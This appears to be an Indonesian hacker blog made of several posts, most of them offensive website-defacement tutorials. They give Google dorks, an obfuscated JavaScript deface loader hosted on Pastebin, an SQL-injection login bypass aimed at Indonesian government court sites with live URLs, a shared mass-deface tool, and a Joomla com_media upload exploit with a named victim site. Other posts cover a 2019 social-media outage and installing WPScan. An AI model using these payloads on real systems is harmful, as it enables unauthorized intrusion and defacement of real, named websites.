Code nama domain setiap negara untuk mengembangkan dork


Wassap my bitch :v
Saiia akan share code setiap negara untuk ngembangin dork.
Example :
Inurl://admin login site:.id

Langsung ae y :v

Nama Negara Kode Domain
Afganistan AF
Afrika Selatan ZA
Afrika Tengah, Republik CF
Åland, Kepulauan AX
Albania AL
Aljazair DZ
Amerika Serikat US
Andorra AD
Angola AO
Anguilla AI
Antarktika AQ
Antigua dan Barbuda AG
Antillen Belanda AN
Arab Saudi SA
Argentina AR
Armenia AM
Aruba AW
Australia AU
Austria AT
Azerbaijan AZ
Bahama BS
Bahrain BH
Bangladesh BD
Barbados BB
Belanda NL
Belarus BY
Belgia BE
Belize BZ
Benin BJ
Bermuda BM
Bhutan BT
Bolivia BO
Bosnia-Herzegovina BA
Botswana BW
Bouvet, Pulau BV
Brasil BR
Britania Raya GB
Britania di Samudera Hindia, Teritorial IO
Brunei BN
Bulgaria BG
Burkina Faso BF
Burundi BI
Cayman, Kepulauan KY
Chad TD
Ceko, Republik CZ
Chili CL
Cina, Republik Rakyat CN
Cocos (Keeling), Kepulauan CC
Cook, Kepulauan CK
Denmark DK
Djibouti DJ
Dominika DM
Dominika, Republik DO
Ekuador EC
El Salvador SV
Eritrea ER
Estonia EE
Ethiopia ET
Falkland, Kepulauan FK
Faroe, Kepulauan FO
Fiji FJ
Filipina PH
Finlandia FI
Gabon GA
Gambia GM
Georgia GE
Georgia Selatan dan Kepulauan Sandwich Selatan GS
Ghana GH
Gibraltar GI
Greenland GL
Grenada GD
Guadeloupe GP
Guam GU
Guatemala GT
Guernsey GG
Guinea GN
Guinea-Bissau GW
Guinea Khatulistiwa GQ
Guyana GY
Guyana Perancis GF
Haiti HT
Heard dan Kepulauan McDonald, Pulau HM
Honduras HN
Hong Kong HK
Hongaria HU
Islandia IS
India IN
Indonesia ID
Irak IQ
Iran IR
Irlandia, Republik IE
Israel IL
Italia IT
Jamaika JM
Jepang JP
Jerman DE
Jersey JE
Kaledonia Baru NC
Kamboja KH
Kamerun CM
Kanada CA
Kazakhstan KZ
Kenya KE
Kiribati KI
Kolombia CO
Komoro KM
Kongo, Republik CG
Kongo, Republik Demokratik CD
Korea, Republik KR
Korea, Republik Rakyat Demokratik KP
Kosta Rika CR
Kroasia HR
Kuba CU
Kuwait KW
Kirgizstan KG
Laos LA
Latvia LV
Lebanon LB
Lesotho LS
Liberia LR
Libya LY
Liechtenstein LI
Lituania LT
Luksemburg LU
Makau MO
Makedonia, Republik MK
Madagaskar MG
Malawi MW
Malaysia MY
Maladewa MV
Mali ML
Malta MT
Man, Pulau IM
Mariana Utara, Kepulauan MP
Maroko MA
Marshall, Kepulauan MH
Martinik MQ
Mauritania MR
Mauritius MU
Mayotte YT
Meksiko MX
Mikronesia, Federasi FM
Moldova MD
Mesir EG
Monako MC
Kepulauan Luar Minor Amerika Serikat UM
Mongolia MN
Montenegro ME
Montserrat MS
Mozambik MZ
Myanmar MM
Namibia NA
Nauru NR
Natal, Pulau CX
Nepal NP
Nikaragua NI
Niger NE
Nigeria NG
Niue NU
Norfolk, Pulau NF
Norwegia NO
Oman OM
Pakistan PK
Palau PW
Palestina PS
Panama PA
Pantai Gading CI
Papua Nugini PG
Paraguay PY
Perancis FR
Perancis Selatan, Teritorial TF
Peru PE
Pitcairn, Kepulauan PN
Polandia PL
Polinesia Perancis PF
Portugal PT
Puerto Riko PR
Qatar QA
Réunion RE
Rumania RO
Rusia RU
Rwanda RW
Sahara Barat EH
Saint-Barthélemy BL
Saint Helena SH
Saint Kitts dan Nevis KN
Saint Lucia LC
Saint Martin (Perancis) MF
Saint Pierre dan Miquelon PM
Saint Vincent dan Grenadines VC
Samoa WS
Samoa Amerika AS
San Marino SM
Sao Tome dan Principe ST
Selandia Baru NZ
Senegal SN
Serbia RS
Seychelles SC
Sierra Leone SL
Singapura SG
Siprus CY
Slovenia SI
Slowakia SK
Solomon, Kepulauan SB
Somalia SO
Spanyol ES
Sri Lanka LK
Sudan SD
Suriah SY
Suriname SR
Svalbard dan Jan Mayen SJ
Swaziland SZ
Swedia SE
Swiss CH
Taiwan TW
Tajikistan TJ
Tanjung Verde CV
Tanzania TZ
Thailand TH
Timor Leste TL
Togo TG
Tokelau TK
Tonga TO
Trinidad dan Tobago TT
Tunisia TN
Turki TR
Turkmenistan TM
Turks dan Caicos, Kepulauan TC
Tuvalu TV
Uganda UG
Ukraina UA
Uni Emirat Arab AE
Uruguay UY
Uzbekistan UZ
Vanuatu VU
Vatikan VA
Venezuela VE
Vietnam VN
Virgin Britania Raya, Kepulauan VG
Virgin Amerika Serikat, Kepulauan VI
Wallis dan Futuna WF
Yaman YE
Yordania JO
Yunani GR
Zambia ZM
Zimbabwe ZW
Moga bermanfaat :v Daaa :'V

How to make jso script


Assalamualaikum
Hay gay meet me again: v
yes this time we will give you a tutorial on how to create a JSO Script

Ok, just go ahead, see the tutor is good !!


1. Your first step is to open the web below on your Browser




2. Then prepare your Deface Script, then copy all your deface scripts.

3. After that, paste your deface script that was copied in the Web design section.



4. Then you click charCodeAT () in the middle.







5. Then Copy the Hexa Decimal Code below,
This is the code

document.documentElement.innerHTML = String.fromCharCode (Code Char Here)
6. After that Copas All Hexal Code and charCodeAT () as shown above the previous one
7. Then go to this link http://pastebin.com
And click new paste
8.continue to select raw

6.continue to select create new -> raw


7.then copy the raw pastebin link, then add the code like this 
8. <script type = "text / javascript" src = "link raw Pastebin">

Example : 
<script type = "text / javascript" src = "https://pastebin.com/raw/vJ4EWkf8">

ok I think its enough sorry if there is an error Assalamualaikum

Bypass SQl login Indonesian Government with jso


[#]Author: 5YN15T3R_742
[#]Team: Akatsuki Attacker id
[+]Goolge Dork: intext:"admin login panjar pa" site:.go.id

*for those who don't know yet: v

Find website with the dork
Login url will be site.go.id/admin

example :
http://panjar.pa-pemalang.go.id/admin/
Login with this detail
user name: ' or 1=1 limit 1 -- -+
password : ' or 1=1 limit 1 -- -+

keep going to settings -> user intentions -> paste your jso script


[+] How to make jso script

continue to save

congratulations, you are a hacker :v

[+] Demo site
http://panjar.pa-pemalang.go.id/admin/login
http://panjar.pa-makale.go.id/admin/login
https://pa-putussibau.go.id/eskum/admin/login

Penyebab WhatsApp , Facebook dan Instagram mengalami error hari ini, Kamis (14/3/2019)


Tiga platform media sosial yakni WhatsApp , Facebook dan Instagram dikabarkan mengalami error hari ini, Kamis (14/3/2019).

Bahkan untuk media sosial Instagram, telah dirasakan oleh beberapa pengguna di Indonesia sejak semalam.
Ketiga platform media sosial yakni, Facebook dan Instagram tampaknya mengalami error di seluruh dunia untuk saat ini.
Menurut uji coba saiaa :v, meski Whatsapp , Facebook dan Instagram dapat dibuka, namun tidak dapat mengirim atau menerima pesan. Fb w tadi malem kena sesi bgst >:v.

Sementara itu, WhatsApp tampaknya baik-baik saja bagi banyak orang, tetapi pengguna di Paraguay, India, Bangladesh, Argentina, dan banyak lagi mencatat bahwa mereka mengalami masalah dengan pengiriman pesan gambar.
DownDetector menunjukkan bahwa mereka yang berada di Brasil mengalami pemadaman paling parah.
Melansir the verge.com ditemukan Messenger tidak dapat memuat sama sekali di desktop, meskipun aplikasi seluler berfungsi.
Instagram lebih buruk: posting tidak dimuat, Cerita Instagram tidak aktif, dan pesan langsung dan tombol untuk mengirim konten baru juga tidak berfungsi.
Tidak dapat memuat ulang kabar berita.




Sekitar satu jam setelah pengguna mencatat pemadaman, Facebook merespons di Twitter.

Ia juga mencatat bahwa "masalah ini tidak terkait dengan serangan DDoS."
Menurut DownDetector, sepertinya pemadaman terutama di New England; Texas; Seattle, Washington; bagian dari Amerika Latin, termasuk Peru; Inggris; India; dan Filipina.
Pengguna telah menulis dari Kanada, Las Vegas, dan Turki untuk mencatat pemadaman di sana juga. Kami telah menjangkau Facebook dan Instagram untuk mempelajari lebih lanjut.
Sementara itu di Indonesia juga mengalami hal yang sama.

Penyebab:

Kesalahan teknis tidak dapat dihindari sekalipun oleh perusahaan media sosial besar seperti facebookinstagram dan whatsapp. Kenapa errornya terjadi di waktu yang sama? 

Menurut saya, mungkin karena whatsapp merupakan media chatting memiliki pengembang yang sama dengan instagram dan Facebook. Jadi mungkin masih ada hubungannya antara ketiga media sosial dan chatting tersebut. 

Jadi untuk masalah error yang terjadi pada facebook dan whatsapp, kita tidak bisa menghindarinya. Karena itu merupakan kesalahan teknis dari developer facebooknya. 

Yang berarti semua akun facebook dan pengguna whatsapp mengalami masalah yang sama dengan akun milik sobat. 

Jadi kita hanya menunggu saja kabar baik dari Facebook. Semoga pihak facebook dapat segera masalah yang sedang terjadi.

Tools Rusuh yang Mungkin Kalian Suka




Oit w is back >:'V

Sesuai tema kyta di pagi , siang ,sore ,malam ini :'V
"Tools Rusuh yg Mungkin Kalian Suka" :'v (
(Tools Mass Deface

Nah ini tools uda lumayan lama si , tapi baru w up sekarang :'v

Tampilan   

              







Ada beberapa tools mass deface yg ada di berkas , tapi entah kenapa itu yang pengn w share :'v


Tampilan done :'V



Cara gunainya kek bisanya
Buat yg blum tau gini
Kalau mau mass all dir sampe di patch public_html
Klo cuma one dir ya udah ada di sna ,
Intinya kalau mau mass all dir tinggl kurang n site setelah public_html , hanya sampe public_html

Di sana udah auto anu :'v
Jadi nga usah di tulis
Tinggal up copas sc -> index.html/index php done

Minat ?
  Scriptnya->>  https://pastebin.com/raw/kwqmcgDq

Udah ya :'v

Daaa :'v

See u :'v

































Cara deface menggunakan Exploit com_media


Yo wassap :'>

Ketemu lagi sama saia.
Saia selaku anak tamvan akan membagikan cara deface menggunakan exploit com_media d :'>
Langsung ae gan :'v
Sebelumnya elu siapkan file dlm bentuk .txt

Goo

Dork   : inurl:com_media site:com 
Exploi:/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=


Seperti biasa dorking ke gugel 

Nah terus pilih salah satu :'v
Satu aja ea meq>:'V

Setelah dapet tambah exploitnya :'>

Contoh : https://avd-weiden.bayern/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Nah gitu jembud :'v
Terus klean akan menemukan uploader 
Tinggal up file kyta 
*Ext : txt,png,jpg

Tinggal buka gini
https://avd-weiden.bayern/images/syn.txt
syn.txt itu file w ya meq >:'v
Jadi
Site.com/images/filemu.txt

Done selamat anda menjadi heker :'v


 tinggal mirror 


Sekian dolo :'>

How to install WPScan in Android with Termux


Yooo wasssap!
Siang,sore,malam,pagi gan :'V
Kali ini w ada cara bagaimana install wp scan di android with termos/Termux :'V


WPScan adalah scanner yang memeriksa keamanan wordpress

Fitur² ato kegunaannya adalah :
1. Pencari kerentanan pada CMS WordPress.
2. Mengintip versi WordPress sebuah website.
3. Multi-threaded, weak password cracking.
4. Username enumeration (from the author).
*Dan lain-lain :'v.
Langsung ae :'V.

-command
$ apt update &amp;&amp; apt upgrade
$ apt install git
$ apt install ruby
$ git clone https://github.com/wpscanteam/wpscan/
$ cd wpscan
$ chmod 777 wpscan.rb
$ gem install bundle
$ bundle install -j5
$ ruby wpscan.rb

cara gunainnya:

$ ruby wpscan.rb -u (url target)
$ ruby wpscan.rb -u (url target) –enumerate p (mencari plugins yang terinstall di site target)
$ ruby wpscan.rb -u (url target) –enumerate u (mencari username yang terinstall di site target)
Done_^
Klo kurang jelas ke sini_^
Skian dolo_^
See you[-!-]

- Copyright © 5YN15T3R_742 & SeT1aP_DeTiK - Hatsune Miku - Powered by Blogger - Designed by Johanes Djogan -